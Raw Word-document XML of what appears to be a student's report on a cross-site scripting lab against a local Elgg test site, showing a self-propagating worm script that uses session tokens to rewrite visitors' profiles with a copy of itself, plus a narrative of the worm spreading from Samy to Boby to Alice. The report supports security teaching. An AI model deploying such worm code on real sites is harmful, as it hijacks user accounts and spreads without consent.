        <w:t>    var userName=</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>elgg.session.user.name</w:t>
        </w:r>
      </w:hyperlink>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var guid="&amp;guid="+elgg.session.user.guid;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    //Copy the JavaScript itself</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var headerTag = "&lt;script id=\"worm\" type=\"text/javascript\"&gt;";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var jsCode = document.getElementById("worm").innerHTML;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var tailTag = "&lt;/" + "script&gt;";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var wormCode = encodeURIComponent(headerTag + jsCode + tailTag)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    //Construct the content of your url.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var content=token + ts + "&amp;name=" + userName + "&amp;description=" + wormCode + guid; //FILL IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var samyGuid=47; //FILL IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    var sendurl = "</w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://www.xsslabelgg.com/action/profile/edit</w:t>
        </w:r>
      </w:hyperlink>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if(elgg.session.user.guid!=samyGuid)</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//Create and send Ajax request to modify profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        var Ajax=null;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax=new XMLHttpRequest();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.open("POST",sendurl,true);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.setRequestHeader("Host","</w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.xsslabelgg.com</w:t>
        </w:r>
      </w:hyperlink>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Ajax.setRequestHeader("Content-Type",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        "application/x-www-form-urlencoded");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        Ajax.send(content);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        alert("Worm!");</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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70FEEC" w14:textId="05F073B0" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7492D324" w14:textId="3FBB12BA" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CA2CC9" w14:textId="1524CBE0" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAE1456" w14:textId="144EF76B" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347684FC" w14:textId="41D88B77" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6B3EDB" w14:textId="4C571D3E" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4509AA84" w14:textId="1EDF5F60" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5A9C0C" w14:textId="01215EB7" w:rsidR="006575E1" w:rsidRDefault="006575E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15AF9167" w14:textId="3086D68F" w:rsidR="006575E1" w:rsidRDefault="006575E1" w:rsidP="006575E1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q8.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1F168" w14:textId="3ABFB634" w:rsidR="00B07898" w:rsidRDefault="00B07898" w:rsidP="006575E1">
      <w:r>
        <w:t>Step 1: Embed the self-propagating JavaScript code into Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B4AC0" w14:textId="6627D4B5" w:rsidR="006575E1" w:rsidRDefault="00B07898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD6DE5D" wp14:editId="39D84B1C">
            <wp:extent cx="5943600" cy="35540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73E4A89F" w14:textId="61E58995" w:rsidR="00B07898" w:rsidRDefault="00B07898">
      <w:r>
        <w:t>Step 2: Log in as Boby to view Samy’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC02DA" w14:textId="22245043" w:rsidR="00B07898" w:rsidRDefault="00B07898">
      <w:r>
        <w:t>Boby’s profile before visiting Samy’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586E493" w14:textId="252906E3" w:rsidR="00B07898" w:rsidRDefault="00B07898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B8E0EE2" wp14:editId="503365B0">
            <wp:extent cx="5943600" cy="33134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p>
    <w:p w14:paraId="31F9FFDE" w14:textId="78014675" w:rsidR="006F270F" w:rsidRDefault="00793CDF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Boby visits Samy’s profile. Boby gets infected with the worm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C6848" w14:textId="38247D4C" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB7043A" wp14:editId="6D718C69">
            <wp:extent cx="5943600" cy="3663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63315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7AED7" w14:textId="15B47A79" w:rsidR="00793CDF" w:rsidRDefault="00793CDF"/>
    <w:p w14:paraId="47CB3F69" w14:textId="4B9B88E5" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:t>Boby visits his own profile and finds himself infected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C932736" w14:textId="28DF8971" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E82E2E2" wp14:editId="65E1778E">
            <wp:extent cx="5943600" cy="33877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87725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A87C22" w14:textId="39243099" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A closer look at Boby’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0345677E" w14:textId="3C692464" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2373FEDD" wp14:editId="2DFC0A4E">
            <wp:extent cx="5943600" cy="34226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28A5DCC2" w14:textId="39EDEDDB" w:rsidR="00793CDF" w:rsidRDefault="00793CDF"/>
    <w:p w14:paraId="77CABC61" w14:textId="634075A5" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:t>Step 3: Log in as Alice to view Boby’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE1DB3" w14:textId="344894A6" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:t>Alice’s profile before visiting Boby’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28335E7E" w14:textId="48C6BB39" w:rsidR="00793CDF" w:rsidRDefault="00793CDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DFF699F" wp14:editId="05877DB3">
            <wp:extent cx="5943600" cy="310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0B094C35" w14:textId="26A4783F" w:rsidR="00793CDF" w:rsidRDefault="00793CDF"/>
    <w:p w14:paraId="0EA5DA69" w14:textId="7C839248" w:rsidR="00A853EE" w:rsidRDefault="00A853EE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Alice visits Boby’s profile. Alice gets infected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1EAD2" w14:textId="05E8E511" w:rsidR="00793CDF" w:rsidRDefault="00A853EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="074A42CA" wp14:editId="26EE7FAB">
            <wp:extent cx="5943600" cy="33293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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A8657D" w14:textId="77777777" w:rsidR="00A853EE" w:rsidRDefault="00A853EE"/>
    <w:p w14:paraId="46C7B6A8" w14:textId="13D24D37" w:rsidR="00A853EE" w:rsidRDefault="00A853EE">
      <w:r>
        <w:t>Alice visits her own profile and finds herself infected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CBA11" w14:textId="214A3B9D" w:rsidR="00A853EE" w:rsidRDefault="00A853EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E899901" wp14:editId="3FB4233B">
            <wp:extent cx="5943600" cy="3244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37DDA949" w14:textId="117CE18B" w:rsidR="00A853EE" w:rsidRDefault="00A853EE"/>
    <w:p w14:paraId="7EE54E8F" w14:textId="3E03C593" w:rsidR="00A853EE" w:rsidRDefault="00A853EE"/>
    <w:p w14:paraId="31BF7B89" w14:textId="59EA59D0" w:rsidR="00A853EE" w:rsidRDefault="00A853EE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A closer look at Alice’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8477C7" w14:textId="287B9588" w:rsidR="00A853EE" w:rsidRDefault="00A853EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="096B5670" wp14:editId="1ADB89B2">
            <wp:extent cx="5943600" cy="2862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p>
    <w:p w14:paraId="28244E16" w14:textId="31C1F664" w:rsidR="00A853EE" w:rsidRDefault="00A853EE"/>
    <w:p w14:paraId="79163A02" w14:textId="64BC5D34" w:rsidR="00A853EE" w:rsidRDefault="00A853EE"/>
    <w:p w14:paraId="2950851C" w14:textId="7A74CDB3" w:rsidR="00A853EE" w:rsidRDefault="00A853EE">
      <w:r>
        <w:t>Evidence that the attack was successful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04488E" w14:textId="6DAD70A1" w:rsidR="00A853EE" w:rsidRDefault="009B4DE3">
      <w:r>
        <w:t>Samy was the attacker and there was a single source of malicious code at Samy’s profile</w:t>
      </w:r>
      <w:r w:rsidR="00E7738A">
        <w:t xml:space="preserve"> in the beginning</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Boby and Alice were both healthy at the </w:t>
      </w:r>
      <w:r w:rsidR="006E0DBF">
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. However, Boby visited Samy’s profile and got infected. Then later when Alice visited Boby’s profile she also got infected. We know that the worm has spread since Alice did not directly visit Samy’s profile, but instead got infected through Boby. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C6BD96" w14:textId="3063F47E" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="05A746D1" w14:textId="7D546683" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="29ED9E56" w14:textId="1BE00EB4" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="7DA0D179" w14:textId="1D91171B" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="62301BEE" w14:textId="6AAC7158" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="74852EC8" w14:textId="3460AB7D" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="7B9FA58F" w14:textId="369F6645" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="1C2340B5" w14:textId="0F7618DA" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="40A42668" w14:textId="74623AFF" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="777E32F5" w14:textId="3F75D79E" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="26DD908E" w14:textId="1CFF6E5B" w:rsidR="004A015D" w:rsidRDefault="004A015D"/>
    <w:p w14:paraId="0E395993" w14:textId="5E14007F" w:rsidR="004A015D" w:rsidRDefault="00B551B8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="004A015D">
        <w:t>8.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692065E" w14:textId="579C5FDB" w:rsidR="00E26D68" w:rsidRDefault="00E26D68">
      <w:r>
        <w:t>How the worm would propagate?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652B9CEA" w14:textId="62290ED0" w:rsidR="00CA169C" w:rsidRDefault="00CE4993">
      <w:r>
        <w:t xml:space="preserve">Each time a healthy user, whose profile has not been infected with the worm, visits an unhealthy user, whose profile has been infected with the malicious JavaScript code, the healthy user becomes unhealthy and gains the ability </w:t>
      </w:r>
      <w:r w:rsidR="0070296E">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> spread the worm when another healthy user visits his/her profile.</w:t>
      </w:r>
      <w:r w:rsidR="00DB5EB0">
        <w:t xml:space="preserve"> Initially, there was only one unhealthy user, </w:t>
      </w:r>
      <w:r w:rsidR="00BD0036">
        <w:t xml:space="preserve">namely </w:t>
      </w:r>
      <w:r w:rsidR="00DB5EB0">
        <w:t>Samy</w:t>
      </w:r>
      <w:r w:rsidR="00BD0036">
        <w:t>, who has the worm in his profile</w:t>
      </w:r>
      <w:r w:rsidR="00DB5EB0">
        <w:t>. But as time passes, the worm</w:t>
      </w:r>
      <w:r w:rsidR="00185A59">
        <w:t xml:space="preserve"> replicates and</w:t>
      </w:r>
      <w:r w:rsidR="00DB5EB0">
        <w:t xml:space="preserve"> propagates itself among the population.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A35DA" w14:textId="5A60C270" w:rsidR="00A62743" w:rsidRDefault="00A62743"/>
    <w:p w14:paraId="0081B82D" w14:textId="161A4CD3" w:rsidR="007A6A52" w:rsidRDefault="007A6A52">
      <w:r>
        <w:t>Why does the worm propagate?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01EC8F" w14:textId="43EFC754" w:rsidR="007A6A52" w:rsidRDefault="007A6A52">
      <w:r>
        <w:t xml:space="preserve">Because </w:t>
      </w:r>
      <w:r w:rsidR="00050AEF">
        <w:t>whenever people visit an infected profile, the worm will be propagated to their profiles, further affecting others who view these newly infected profiles.</w:t>
      </w:r>
      <w:r w:rsidR="002370AF">
        <w:t xml:space="preserve"> The malicious JavaScript has the ability to replicate itself, and </w:t>
      </w:r>
      <w:r w:rsidR="005D43C6">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="002370AF">
        <w:t xml:space="preserve">is called a </w:t>
      </w:r>
      <w:r w:rsidR="002370AF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>self-propagating cross-site scripting worm</w:t>
      </w:r>
      <w:r w:rsidR="002370AF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B39F83" w14:textId="59FB55CE" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="1A17AB49" w14:textId="1912D521" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="02872304" w14:textId="155703A2" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="463313A7" w14:textId="3085C82F" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="175D76BD" w14:textId="77A0E4F5" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="727C82F6" w14:textId="2DB9103A" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="2FB05A76" w14:textId="1B8B2F18" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="459A7779" w14:textId="51E628EF" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="05BD39B6" w14:textId="475BA946" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="2279B813" w14:textId="682D887D" w:rsidR="005D43C6" w:rsidRDefault="005D43C6"/>
    <w:p w14:paraId="35DA15D4" w14:textId="0A842782" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="0AEC5044" w14:textId="26CFF05C" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="1244C0FB" w14:textId="72AC2290" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="50B6F628" w14:textId="160E4283" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="3C1A573C" w14:textId="599162C0" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="3986444E" w14:textId="6EF73508" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="1CBA65CD" w14:textId="35E0208C" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="724D61BD" w14:textId="1DAB896C" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="58C3AE27" w14:textId="65FCF7AA" w:rsidR="00C85F89" w:rsidRDefault="00C85F89"/>
    <w:p w14:paraId="34B62B5F" w14:textId="45549A0C" w:rsidR="00C85F89" w:rsidRDefault="00B551B8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6A0BD" w14:textId="015534EE" w:rsidR="00BD26B6" w:rsidRDefault="0054600B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
